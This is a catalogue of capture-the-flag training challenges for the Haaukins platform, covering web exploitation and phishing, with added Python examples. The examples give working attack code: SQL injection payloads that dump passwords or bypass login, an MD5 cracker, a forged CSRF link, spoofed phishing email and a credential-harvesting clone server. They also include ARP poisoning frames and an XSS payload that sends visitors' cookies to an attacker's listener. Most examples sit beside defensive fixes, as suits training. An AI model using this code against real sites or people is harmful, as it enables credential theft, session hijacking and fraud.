Web Exploitation
Web Exploitation challenges for Haaukins Platform.
This category includes all challenges that provide a vulnerable website, from those that contain a single bug to those that run on an old version of a framework. All challenges in this category are of the same kind: the user needs to exploit a bug in the web application to gain some higher level of privilege.
Difficulty Levels
The difficulty scale is based on the number of steps required to solve the training challenge:
- __Very Easy:__ requires just one step to get the flag
- __Easy:__ requires one or two steps, depending on the challenge category
- __Medium:__ requires two or three steps, depending on the challenge category
- __Hard:__ requires three or four steps, depending on the challenge category
- __Very Hard:__ requires several steps to get the flag
SQL Injections
SQL Injection
Points: 50 Difficulty: Medium
Learning Objectives:
- Understand how an SQL injection attack is performed
- SQL language and its syntax
Description: In this challenge the HAAUKINS user is expected to use knowledge about web service communication. After accessing and logging into the website from challenge “1.3: Web server login”, the user should notice that the home screen includes a comments field. A posted comment is shown on the page, which indicates that the input reaches a database. From this the user is expected to craft a malicious SQL query and inject it through the comments field in order to read passwords from the users table of the database.
Prerequisite:
- Understand the fundamentals of database communication (SQL)
SQL Users
Points: 26 Difficulty: Medium
Learning Objectives:
- Learn a bit of the pentesting workflow (enumeration).
- Learn the importance of sanitizing inputs during development.
- Learn the basic idea of SQL injection.
Description: Use SQL injection to bypass the password check of the page's owner.
Prerequisite:
- Understand the fundamentals of database communication (SQL)
SQL Easy
Points: 18 Difficulty: Medium
Learning Objectives:
- Understand how an SQL injection attack is performed
- SQL language and its syntax
Description: In this exercise the user needs to find the place where the website is vulnerable to SQL injection, use it to change the credentials of the first user in the users table, then log in with those credentials and find the flag.
Prerequisite:
- Understand the fundamentals of database communication (SQL)
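The three SQL injection challenges above share one root cause: user input concatenated into a query string. The following is an added example, not code from the Haaukins challenges; the table layout, the shape of the vulnerable statements and the sample credentials are assumptions. It reproduces both patterns with Python's built-in sqlite3 driver: pulling the users table out through the comments field, as in SQL Injection, and skipping the password check on a login form, as in SQL Users, each next to the parameterised version that stops it.

```python
import sqlite3

# Constructed sample data; the real challenge databases differ.
USERS = [("admin", "s3cr3t-constructed"), ("bob", "bob-pw-constructed")]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    conn.commit()
    return conn


# --- Pattern 1: comments field -> data extraction -------------------------

def post_comment_vulnerable(conn, body):
    # The comment text is pasted straight into the statement.
    conn.execute("INSERT INTO comments (body) VALUES ('" + body + "')")
    conn.commit()


def post_comment_safe(conn, body):
    # Bound parameter: the driver passes the text separately from the SQL.
    conn.execute("INSERT INTO comments (body) VALUES (?)", (body,))
    conn.commit()


def list_comments(conn):
    return [row[0] for row in conn.execute("SELECT body FROM comments ORDER BY id")]


# Closes the string literal, appends a second VALUES row whose content is a
# subquery over users, and comments out the remainder of the statement.
COMMENT_PAYLOAD = (
    "hello'), ((SELECT group_concat(username || ':' || password, ', ') "
    "FROM users)) -- "
)


def extract_passwords_via_comment():
    conn = setup_db()
    post_comment_vulnerable(conn, COMMENT_PAYLOAD)
    return list_comments(conn)      # second "comment" now lists every credential


def comment_stored_literally():
    conn = setup_db()
    post_comment_safe(conn, COMMENT_PAYLOAD)
    return list_comments(conn)      # the payload is stored as plain text


# --- Pattern 2: login form -> authentication bypass -----------------------

def login_vulnerable(conn, username, password):
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


# Ends the username string and turns the password check into a comment.
LOGIN_PAYLOAD = "admin' -- "


def bypass_login():
    conn = setup_db()
    return login_vulnerable(conn, LOGIN_PAYLOAD, "anything")


def bypass_blocked():
    conn = setup_db()
    return login_safe(conn, LOGIN_PAYLOAD, "anything")


if __name__ == "__main__":
    print(extract_passwords_via_comment())
    print(comment_stored_literally())
    print(bypass_login(), bypass_blocked())
```

The comment payload avoids stacked queries (a second `;`-separated statement), which many drivers, sqlite3 included, refuse in a single execute call; a multi-row VALUES list with a scalar subquery is still one statement and works wherever the input lands inside an INSERT.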
Micro CMS XSS, URL and robots
Points: 10-14-18 Difficulty: Very easy
Learning Objectives:
- Learn how important it is to sanitize data submitted through a form
- Manage and Modify the URL
Description: This challenge provides a basic Content Management System (CMS) with an interface in which the user can create and edit web pages. The main goal is to let the user understand how XSS works and how data can be retrieved by manipulating the URL. The user has to find three flags (the order doesn’t matter):
Prerequisite:
- Know how Cross-Site Scripting (XSS) works
Heartbleed
Points: 16 Difficulty: Easy
Learning Objectives:
- Achieve confidence using the Metasploit framework
- Understand that services behind encrypted web traffic (HTTPS) can still be exploited
Description: In this challenge the HAAUKINS user is expected to carry out an attack abusing the well-known Heartbleed bug, a serious vulnerability in the widely used OpenSSL cryptographic library. The bug lets an attacker read memory of the affected process, including information otherwise protected by SSL/TLS encryption. The user is expected to gather information about conducting a Heartbleed attack from Google, then configure a Metasploit session to complete the exploit. The target host should be identified through an active network scan.
Prerequisite:
- Fundamentals in Linux terminal
- Knowing what Metasploit is and its capabilities
Exposed Logging Login Blogging
Points: 20 Difficulty: Easy
Learning Objectives:
- Learning about the role of the robots.txt file on the web.
- Learning about the danger of exposing sensitive data, such as logs, on a web site.
- Learning how to crack MD5 hashes, a skill reused in other challenges.
Description: A log file containing sensitive data protected only by weak (MD5) hashing is left exposed on a website, guarded by nothing but obscurity. Its location is revealed by the robots.txt file. By piecing together the information in the log file the challenger can recover a password. Logging in and posting on the blog reveals the flag.
Prerequisite:
- Knowing that ‘/’ in URLs can be used to access different pages/resources on the same domain.
- Ability to understand the basic relationship between a hash value and an original input.
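The following is an added example of the two steps this challenge asks for, not the challenge's own files: the robots.txt, the log excerpt and the wordlist are constructed here. It extracts the disallowed paths from robots.txt, then picks the MD5 hashes out of the exposed log and cracks them offline with hashlib, which is what a tool such as John the Ripper does at scale.

```python
import hashlib
import re

# Constructed robots.txt; a Disallow line is a hint, not a protection.
ROBOTS_TXT = """User-agent: *
Disallow: /admin/
Disallow: /logs/app.log
Allow: /
"""

# Constructed excerpt of the exposed log: unsalted MD5 of user passwords.
APP_LOG = """2021-03-02 10:14:03 INFO  login ok user=alice pwhash=5f4dcc3b5aa765d61d8327deb882cf99
2021-03-02 10:16:41 WARN  login failed user=bob pwhash=e10adc3949ba59abbe56e057f20f883e
2021-03-02 10:17:09 INFO  post created user=alice id=42
"""

# Constructed wordlist; a real attempt would use rockyou.txt or similar.
WORDLIST = ["letmein", "password", "123456", "qwerty"]

MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")


def disallowed_paths(robots_txt):
    """Return every path a robots.txt asks crawlers to stay away from."""
    paths = []
    for line in robots_txt.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def hashes_in_log(log_text):
    """Collect (user, hash) pairs from lines that carry an MD5-looking field."""
    found = []
    for line in log_text.splitlines():
        user = re.search(r"user=(\S+)", line)
        digest = MD5_RE.search(line)
        if user and digest:
            found.append((user.group(1), digest.group(0)))
    return found


def crack_md5(digest, wordlist):
    """Brute-force an unsalted MD5 hash against a wordlist; None if not found."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == digest:
            return candidate
    return None


def recover_credentials(robots_txt=ROBOTS_TXT, log_text=APP_LOG, wordlist=WORDLIST):
    """Hidden paths first, then a user -> cracked password map."""
    paths = disallowed_paths(robots_txt)
    creds = {user: crack_md5(h, wordlist) for user, h in hashes_in_log(log_text)}
    return paths, creds


if __name__ == "__main__":
    print(recover_credentials())
```

Unsalted MD5 falls to a plain dictionary lookup because identical passwords always produce identical hashes; salting and a slow hash such as bcrypt would make the same log far less useful to the attacker.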
Cross-Site Request Forgery
Points: 36 Difficulty: Medium
Learning Objectives:
- Gain a basic understanding of web APIs
Description: In this challenge the user is expected to use knowledge about web service communication. After registering on the website, the user should figure out that the people in the chat click on every link sent to them. Having realised this, the user should use knowledge of the site's web API to craft a link that makes the other users send money, which buys the flag.
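Why such a link works, as an added illustration rather than the challenge's own code (the endpoint path, parameter names and session handling are assumptions): a transfer endpoint that authorises on the session cookie alone will honour any request the victim's browser makes, including one triggered by clicking an attacker's link, because the browser attaches the cookie automatically. The hardened variant also requires a per-session CSRF token that a page on another origin can neither read nor attach to a plain link.

```python
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed server state: balances, session cookie -> user, and the
# anti-CSRF token the hardened endpoint hands out once per session.
BALANCES = {"victim": 100, "attacker": 0}
SESSIONS = {"sess-victim-c0ffee": "victim"}
CSRF_TOKENS = {"sess-victim-c0ffee": secrets.token_hex(16)}


@dataclass
class Request:
    """What the API sees: the URL plus whatever cookies and headers arrived."""
    url: str
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)

    @property
    def params(self):
        return {k: v[0] for k, v in parse_qs(urlparse(self.url).query).items()}


def _apply_transfer(user, req):
    to, amount = req.params["to"], int(req.params["amount"])
    if amount <= 0 or BALANCES[user] < amount:
        return "insufficient funds"
    BALANCES[user] -= amount
    BALANCES[to] += amount
    return "ok"


def transfer_vulnerable(req):
    """Authorises on the session cookie alone: whoever can make the victim's
    browser request this URL spends the victim's money."""
    user = SESSIONS.get(req.cookies.get("session"))
    if user is None:
        return "not logged in"
    return _apply_transfer(user, req)


def transfer_hardened(req):
    """Also demands the per-session CSRF token in a header. Another origin can
    make the browser send cookies, but cannot read the token or add a custom
    header to a link click, so the forged request is rejected."""
    sess = req.cookies.get("session")
    user = SESSIONS.get(sess)
    if user is None:
        return "not logged in"
    token = req.headers.get("X-CSRF-Token", "")
    if not secrets.compare_digest(token, CSRF_TOKENS[sess]):
        return "csrf check failed"
    return _apply_transfer(user, req)


def attacker_link(amount):
    """The link dropped in the chat; it needs nothing secret from the victim."""
    return "http://bank.lab/api/transfer?" + urlencode({"to": "attacker", "amount": amount})


def victim_clicks(link, endpoint):
    """Model of the victim's browser: it follows the link and attaches the
    cookie it holds for bank.lab, but adds no custom headers."""
    return endpoint(Request(url=link, cookies={"session": "sess-victim-c0ffee"}))


def run_demo():
    BALANCES.update({"victim": 100, "attacker": 0})
    forged = victim_clicks(attacker_link(40), transfer_vulnerable)
    blocked = victim_clicks(attacker_link(40), transfer_hardened)
    return forged, blocked, dict(BALANCES)


if __name__ == "__main__":
    print(run_demo())
```

A state-changing action reachable through GET makes the attack a one-line link; requiring POST plus a token (and marking the session cookie SameSite) is the usual combination that closes it.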
Phishing
Convince visitation of URL
Points: 48 Difficulty: Medium
Learning Objectives:
- Introduction to mail servers and protocols such as the Simple Mail Transfer Protocol (SMTP).
- Mail clients and how to send emails through an SMTP server from a terminal.
- Capturing POST requests
Description: Social engineering, including spear-phishing emails, is very popular in the hacking community, because it is a lot easier to hack a person than a computer. In this challenge the HAAUKINS user shall try to trick a person into visiting a website of the user's choice. To do that the user needs to know whom to target, so the first goal is to do some recon on the network and the websites. The next step is to send the target an email containing a URL. Haaukins is a closed environment, so the user has to use the mail server running on the network. Participants can see various flags exposed (through traffic analysis) as they phish an email address listed on the web server.
Prerequisite:
- It is necessary to know how an SMTP server works and how to find services such as a web server and an SMTP server on a network (challenge 1.2).
Impersonate colleague
Points: 58 Difficulty: Medium
Learning Objectives:
- Learn how to send a phishing email
Description: This is a phishing challenge in which the user shall try to trick a person into visiting a website of the user's choice. To do that, the user has to find the target's email address by looking at the network and the website. The email must appear to come from the target's own domain in order to get the flag.
Prerequisite:
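An added example for the two email challenges above, not code from the platform; the mail server address, the email addresses and the lure URL are assumptions. It builds the message with the standard library, lists the SMTP commands the client sends, replays them against a constructed model of a permissive lab relay so both sides of the exchange are visible, and checks the property Impersonate colleague asks for, namely that the From address claims the target's own domain.

```python
import smtplib
from email.message import EmailMessage
from email.utils import parseaddr

MAIL_SERVER = "10.10.10.25"           # assumed address of the lab SMTP server
LURE_URL = "http://10.10.10.66/"      # assumed page on the attacker's Kali box


def build_lure(sender, recipient, url=LURE_URL):
    """The phishing message; the From header is whatever the attacker claims."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Updated expense report"
    msg.set_content(f"Hi,\n\nPlease review the updated report here: {url}\n\nThanks")
    return msg


def same_domain(msg):
    """Impersonate colleague: does the From address share the target's domain?"""
    sender = parseaddr(msg["From"])[1].rpartition("@")[2].lower()
    rcpt = parseaddr(msg["To"])[1].rpartition("@")[2].lower()
    return sender == rcpt


def client_commands(msg, helo="kali"):
    """The lines a mail client sends, in order (RFC 5321 envelope + DATA)."""
    body = msg.as_string().replace("\n", "\r\n")
    return [f"EHLO {helo}",
            f"MAIL FROM:<{parseaddr(msg['From'])[1]}>",
            f"RCPT TO:<{parseaddr(msg['To'])[1]}>",
            "DATA", body + "\r\n.", "QUIT"]


def lab_server_reply(command, state):
    """Constructed model of a permissive relay's replies. It never verifies
    that MAIL FROM is genuine, which is exactly what the phish exploits."""
    if state["in_data"]:
        state["in_data"] = False
        return "250 OK: queued"
    verb = command.split(":")[0].split(" ")[0]
    if verb == "DATA":
        state["in_data"] = True
        return "354 End data with <CR><LF>.<CR><LF>"
    replies = {"EHLO": "250-mail.lab\r\n250 8BITMIME", "MAIL": "250 OK",
               "RCPT": "250 OK", "QUIT": "221 Bye"}
    return replies.get(verb, "500 Unknown command")


def dialogue(msg):
    """The full exchange as (client line, server reply) pairs; the server's
    220 greeting comes first and answers nothing."""
    state = {"in_data": False}
    exchange = [("", "220 mail.lab ESMTP")]
    for cmd in client_commands(msg):
        exchange.append((cmd, lab_server_reply(cmd, state)))
    return exchange


def send(msg, host=MAIL_SERVER):
    """Relay through the real lab server (needs the network; not run by tests)."""
    with smtplib.SMTP(host, 25, timeout=10) as smtp:
        smtp.send_message(msg)


if __name__ == "__main__":
    lure = build_lure("it-support@corp.lab", "alice@corp.lab")
    for client_line, reply in dialogue(lure):
        print("C:", client_line.splitlines()[0] if client_line else "")
        print("S:", reply)
```

The same commands can be typed by hand into `nc <server> 25`, which is the terminal workflow the learning objectives mention; the point to notice is that nothing in the exchange ties the MAIL FROM or the From header to the connecting host.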
Abuse Credentials
Points: 33 Difficulty: Easy
Learning Objectives:
- Introduction to mail servers and protocols such as the Simple Mail Transfer Protocol (SMTP)
- Set up a simple web server serving a custom HTML page
Description: If you can get a person to visit your website, maybe you can also get them to enter credentials and hand them over to you? In this challenge the user continues working on phishing, but learns that it is a lot more than sending some emails to important people: the target has to be tricked into handing over confidential information without becoming suspicious. This can be done by cloning a website the victim trusts and luring the victim to the clone.
Prerequisite:
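An added example of the credential-harvesting page the description refers to (not the challenge's own code; the legitimate site's URL and the look-alike form are constructed): a small standard-library HTTP server that serves a login form, records whatever is POSTed to it, and then redirects the victim to the real page so the detour goes unnoticed.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

REAL_SITE = "http://intranet.corp.lab/login"   # assumed legitimate page to bounce to
CAPTURED = []                                    # credentials harvested so far

# Constructed look-alike form; a real clone copies the target's HTML and CSS.
CLONE_HTML = b"""<html><body><h2>Intranet login</h2>
<form method="POST" action="/login">
  <input name="username"> <input name="password" type="password">
  <button>Sign in</button></form></body></html>"""


def parse_credentials(body):
    """Pull username/password out of an application/x-www-form-urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    return {"username": fields.get("username", [""])[0],
            "password": fields.get("password", [""])[0]}


class CloneHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Any path serves the cloned form.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(CLONE_HTML)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode()
        CAPTURED.append(parse_credentials(body))
        # Bounce the victim to the real site so nothing looks wrong.
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.end_headers()

    def log_message(self, fmt, *args):        # keep the console quiet
        pass


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), CloneHandler).serve_forever()
```

The capture itself is the trivial part; what makes or breaks the attack is the lure mail and how convincing the clone is, and on the defensive side the fact that a password manager or a hardware authenticator bound to the real origin will refuse to fill the fake one.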
Hijack Domain
Points: 70 Difficulty: Very hard
Learning Objectives:
- Learn how spoofing works
- ARP Protocol
Description: This is a phishing challenge in which the user has to hijack the challenge domain: traffic destined for the legitimate website must be redirected to the Kali machine in order to get the flag.
Prerequisite:
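The learning objectives point at ARP spoofing: the Kali machine answers for the legitimate server's IP with its own MAC, so the victim's frames for that IP arrive at Kali instead. The following added example (not the challenge's code; the MAC and IP addresses are constructed) builds and parses the raw Ethernet/ARP frame with struct so the layout is visible, and shows the pair of frames a man-in-the-middle sends; actually transmitting them needs a raw socket and root, which tools such as arpspoof, ettercap or scapy handle.

```python
import socket
import struct

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"     # htype, ptype, hlen, plen, op, sha, spa, tha, tpa


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply claiming sender_ip is at sender_mac."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_TYPE_ARP)
    arp = struct.pack(ARP_FMT,
                      1,            # hardware type: Ethernet
                      0x0800,       # protocol type: IPv4
                      6, 4,         # hardware / protocol address lengths
                      ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode the fields a victim's stack reads when it updates its ARP cache."""
    _dst, _src, eth_type = struct.unpack("!6s6sH", frame[:14])
    if eth_type != ETH_TYPE_ARP:
        raise ValueError("not an ARP frame")
    _htype, _ptype, _hlen, _plen, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"op": op, "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def poison_pair(attacker_mac, victim_mac, victim_ip, server_mac, server_ip):
    """The two frames of a full man-in-the-middle: tell the victim that the
    server's IP lives at the attacker's MAC, and tell the server the same
    about the victim, so both directions pass through Kali."""
    to_victim = build_arp_reply(attacker_mac, server_ip, victim_mac, victim_ip)
    to_server = build_arp_reply(attacker_mac, victim_ip, server_mac, server_ip)
    return to_victim, to_server


def send_raw(frame, iface="eth0"):
    """Needs root and Linux AF_PACKET; not exercised by the tests."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


# Constructed lab addresses.
ATTACKER_MAC = "02:42:ac:11:00:66"
VICTIM_MAC, VICTIM_IP = "02:42:ac:11:00:10", "172.17.0.16"
SERVER_MAC, SERVER_IP = "02:42:ac:11:00:20", "172.17.0.32"

if __name__ == "__main__":
    to_victim, to_server = poison_pair(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, SERVER_MAC, SERVER_IP)
    print(parse_arp(to_victim))
    print(parse_arp(to_server))
```

Once both caches are poisoned the attacker must forward the traffic (IP forwarding on, or a proxy answering on the hijacked ports) so the victim keeps seeing a working site while the requests for the challenge domain land on Kali.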
Cross-Site Scripting
Points: 55 Difficulty: Medium
Learning Objectives:
- Learn how to gain unauthorized access to a website
Description: The challenge consists of two machines, a server and a client. The server hosts a website with a comment section that is vulnerable to JavaScript injection. The user has to use that section to steal the session cookie from the client, which visits the site from time to time. With the stolen cookie the user can act as the authenticated client and find the flag.
Prerequisite:
- Micro CMS
- Know how cookies work
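The stored XSS in Micro CMS and the cookie theft in Cross-Site Scripting are the same bug at two depths. The following is an added example, not code from either challenge; the listener address, the payload and the log line are constructed. It shows the unescaped rendering that lets a comment run as script, the escaped rendering that does not, the payload that ships the visitor's cookie to the attacker's listener, recovery of that cookie from the listener's log for replay, and the HttpOnly flag that keeps a session cookie out of reach even when the injection is still present.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed: the attacker's Kali box, where a listener records hits.
LISTENER = "http://172.17.0.66:8000/"

# Comment that, once stored, runs in every visitor's browser and sends their
# cookies to the listener; an image fetch, so no CORS restriction applies.
XSS_PAYLOAD = ("<script>new Image().src='" + LISTENER +
               "?c='+encodeURIComponent(document.cookie)</script>")


def render_comments_vulnerable(comments):
    """Comments dropped into the page unescaped."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


def render_comments_safe(comments):
    """Every comment is HTML-escaped before it meets markup."""
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in comments) + "</ul>"


def executes_script(page):
    """Crude stand-in for a browser: an unescaped <script> tag will run."""
    return "<script>" in page


def cookie_from_listener_log(log_line):
    """Recover the stolen cookie from the request the victim's browser made."""
    path = log_line.split()[1]
    return parse_qs(urlparse(path).query)["c"][0]


def replay_headers(cookie):
    """Headers the attacker adds to ride the victim's session."""
    return {"Cookie": cookie}


def set_cookie_header(name, value):
    """Server-side mitigation: HttpOnly hides the cookie from document.cookie,
    so this payload exfiltrates nothing even if the XSS remains."""
    return f"Set-Cookie: {name}={value}; HttpOnly; SameSite=Lax; Path=/"


# Constructed listener log line, as the victim's browser would produce it.
LOG_LINE = "GET /?c=session%3D9a1b2c3d4e5f HTTP/1.1"

if __name__ == "__main__":
    print(render_comments_vulnerable([XSS_PAYLOAD]))
    print(render_comments_safe([XSS_PAYLOAD]))
    print(replay_headers(cookie_from_listener_log(LOG_LINE)))
```

Escaping at output time is the fix for the page; HttpOnly limits the damage of the bug that remains. A Content Security Policy that forbids inline script would stop this particular payload as well.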
Unauthenticated Access
Points: 20 Difficulty: Hard
Learning Objectives:
- Understand how HTTP headers work and how to manipulate them in order to get remote code execution.
Description: The challenge provides the user with a website running an old version of Joomla. This CMS suffers from an unauthenticated remote code execution vulnerability affecting all versions from 1.5.0 to 3.4.5. Once commands can be executed on the server, any file it can read becomes accessible, so to get the flag the user has to search for it on the server and read it.
Prerequisite:
- Knowledge about HTTP requests and headers
- Familiarity with Metasploit modules
Remote Access
Points: 65 Difficulty: Very hard
Learning Objectives:
- Know how to use cURL
Description: The challenge provides the user with a website running an old version of Webmin. Webmin is a web-based interface for Unix system administration: using any modern web browser it is possible to set up user accounts, Apache, DNS, file sharing and much more. This web interface suffers from an unauthenticated remote code execution vulnerability affecting version 1.920. The main goal of the challenge is to get the flag contained in a txt file by making requests from the command line (for example with curl) or with Kali Linux tools.
Prerequisite:
- Analyse captured traffic in Wireshark
- Know how to make an HTTP request from command line
Bust-N-Crack
Points: 12-19 Difficulty: Medium
Learning Objectives:
- Learn that it is important to configure a web server correctly and clean up old files
- Learn how to crack a passphrase-protected private SSH key
Description: This exercise contains a host running SSH and HTTP. The user needs to use dirbuster to find the directories exposed by the web server, one of which contains the first flag and an SSH key. The SSH key is protected by a passphrase that can be cracked with John the Ripper. With the passphrase recovered, the key can be used to log in to the server.
Prerequisite:
- Knowledge of John the Ripper/password cracking
- Knowledge of dirbuster
JWT
Points: 30 Difficulty: Medium
Learning Objectives:
- Learn how to exploit JWT
Description: This challenge is based on JSON Web Tokens. The user just needs to log in to reach the main page; any name can be used except admin. Once logged in, the browser's network console shows a cookie called jwt. That cookie determines the session, so to solve the challenge a request with a different (forged) cookie value has to be sent.
Prerequisite:
- Knowledge of JSON Web Token
- Know how to crack a hashed password with Kali Linux
- Knowledge of curl, Burp Suite or any other tool that can forge HTTP requests.
Deeplink
Points: 48 Difficulty: Medium
Learning Objectives:
- Learn how to exploit deeplinks.
Description: This challenge is based on Android intents, which allow other apps and the browser to link to specific screens inside the app. The intent can be exploited to load something else in the app, so from a website it is possible to call other functions inside the app.
Prerequisite:
- Reverse an APK
- Create a simple website